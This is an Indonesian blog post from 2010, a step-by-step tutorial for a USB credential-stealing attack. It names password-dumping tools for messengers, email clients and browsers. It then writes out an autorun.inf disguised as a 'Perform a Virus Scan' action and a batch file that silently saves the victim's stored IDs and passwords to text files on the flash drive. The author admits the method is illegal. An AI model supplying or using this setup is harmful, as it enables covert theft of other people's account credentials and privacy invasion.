Sabtu, 21 Agustus 2010

Hacker FB Via Flash disk

Hacked Pertama-tama kamu harus membutuhkan tools berikut ini:

MessenPass: buat lihat password messenger yang paling populer contohnya: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger yang disediakan dengan Netscape 7, Trillian, Miranda, dan Gaim.

PassView mail: melihat passowrd dari program email berikut: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Gratis.
PassView mail juga dapat memulihkan password Web berbasis account email (Hotmail, Yahoo!, Gmail), jika Anda menggunakan program yang terkait account tersebut.

Passview IE: IE PassView adalah utilitas kecil yang mengungkapkan password yang disimpan oleh browser Internet Explorer. Baru mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 - v6.0

Protected Storage PassView: Sembuh semua password yang tersimpan di dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan banyak lagi ...

PasswordFox: PasswordFox adalah pemulihan password kecil alat yang memungkinkan Anda untuk melihat nama pengguna dan sandi yang disimpan oleh browser Web Mozilla Firefox. Secara default, PasswordFox menampilkan password disimpan dalam profil Anda saat ini, tetapi Anda dapat dengan mudah memilih untuk menonton password Firefox lain profil. Untuk setiap entri kata sandi, informasi berikut ini ditampilkan: Rekam Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons nama file.


OperaPassView.: OperaPassView adalah pemulihan password kecil alat yang memungkinkan Anda untuk melihat nama pengguna dan sandi yang disimpan oleh browser Web Opera


Sebenernya banyak banget tools lainnya (dialuppass,cromepass) .tapi sesuaikan dengan keperluan aja, kamu mau hack apa? firefox,internet explorer,opera, ym, msn, dll. pilihlah tools yang ada disana.


Langkah-langkahnya :
1. Download 6 Tools tersebut lalu taruh di flash diskmu tapi hanya yang .exe aja ya !
contoh : mspass.exe, mailpv.exe, iepv.exe, pspv.exe ,passwordfox.exe,OperaPassView.exe
2. Buka notepad for hacker (kalau belum punya cari pake om google…hehehe) lalu ketikan code berikut :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Lalu save dengan autorun.inf taruh di Folder Flashdisk Kamu

3. Step ke 3...buka lagi notepad baru ketikan code berikut :
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt

Lalu save dengan nama "launch.bat" save di Folder Flashdisk mu juga !!

OK selesai !!!!


Cara pake nya gimana?

1. Tinggal Loe Colokin ech …Masukin dech tuch Flashdisk kamu.
2. Klik launch.bat
3.Nah..Pas kamu sudah pilih option tadi, semua Id & Password sudah kehack ama tools yang tadi secara diem-diem. coba Sekarang buka Flashdisk kamu………. Semua Password sudah Kesimpan di File .Txt kan. !!!
Kalau ngga kesimpen berarti elo salah tuch ikutin langkah-langkah yang sudah gue jelasin. Bawa kopi sama rokok Marlboro ajah ya kerumah gue biar gue jelasin lebih mendetail……hehehe.

NOTE: Beberapa Antivirus menganggap itu sebagai virus..(wajar)…karena itu file yang merecovery password kamu secara illegal. tapi dijamin itu ngga akan menganggu system kamu kok. !!!

Tidak ada komentar:

Posting Komentar